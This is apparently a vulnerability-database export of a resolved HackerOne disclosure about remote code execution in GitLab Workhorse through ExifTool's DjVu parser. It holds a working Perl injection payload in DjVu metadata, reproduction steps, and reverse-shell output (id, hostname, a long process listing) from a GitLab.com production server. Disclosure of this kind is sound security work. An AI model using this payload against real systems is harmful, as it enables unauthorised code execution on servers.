0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T09:29:47", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T08:49:32", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T08:49:32", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQV2NI6HWM%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T092946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHkaCXVzLXdlc3QtMiJIMEYCIQCEsVTy0ezJLwOxLEfkSrNcPlfLBXAJECz9ap2akz4X5AIhAIkA1UXhp91%2Fls7McO92tg3bW5zkkcfqyVejesX25cEbKvoDCBIQAhoMMDEzNjE5Mjc0ODQ5IgxPUhjFUOdYu4u6ZDMq1wO368Ez1yVIREFscDXCZ71SFUWFfdACoOz2%2FuPH6c%2BCL0FU2huMpHXYyS77xY%2FJgmI6%2FYMl9Bm71EC1s6nMPIcqFauyzUTS9ARTflFaDdmZv7%2F5iMcrxrXKC4nHqDBlZiyVkP%2Bxhofn1xDxpiwCh97QTfVK945jfJDw83DZOlZChosgA%2FHVhvAKGbz%2Fb%2FLRnWiQexxxUtPD6yrFUra3NCz79Y%2Fi3w3cd%2F0Sav8A%2FQIoK5rBE1e8pPecJ6yrD0lEo%2BmCnWQqNz7tFwkFIQOIlXpcVzKM7eLjEFegEyHtpRxWEZkyNKt%2FEXJzUImql8IxH4RE8214%2Bjc5v3lJpKym%2B99yd0tNB40PCg8A0sP2oJ1A9Q9CcoyYZd%2FQ6Bo0pe2oOocC8qVRxzNmj2VBz7uIhuJFks6TWOIIBXlQkxSlqjSnL2FcOzjeymLpG72ZYaULXdeHNQLzpR63SpQSAfEY%2BD3mpUxsJgaLwFJJfAZ%2FvvRRPMeR10%2B%2FWk%2FwCQwIPgip8ZJ8AxN8mdffq5BE4HW2iegtfCtC3%2BGplH5SCDbdPp9hmScK3jmuXmjAR5JgONNX%2F1FDae6PZViRU5yeKAOpFZ9qBV7720p0JXahKhs2VgpKSERwpor9oewwqaD%2BhAY6pAGYlQ9FFwelcLSpQGCgZYl0uuLB70K%2FGeOuIPDGQgCHsxG6aYS8Yu8vBkltgbkoHXWJzN%2FiRjZIUUiby%2BOrtYqdA9KBJQ9qCDmPpy6fd0rwZzSo%2F2w08AXudylqsWvkCiGs2H4dXspZwlAa%2F4%2BciSUIb2Qa5dGuY9croZJxOC9MzfaVkSbKN30aQluYas6T1ITKAHnwg2AXUbXk6AV8C2GK9yHt%2Bg%3D%3D&X-Amz-Signature=3dcb9f197e948038839e0ac92993b87b487efc92a18ca4eb62c8828b3446389f"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T09:29:47", "differentElements": ["h1reporter"], "edition": 14}, {"bulletin": {"id": "H1:1154542", "hash": "a7e561a4bea307344c3e6929d0d8f9b7", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 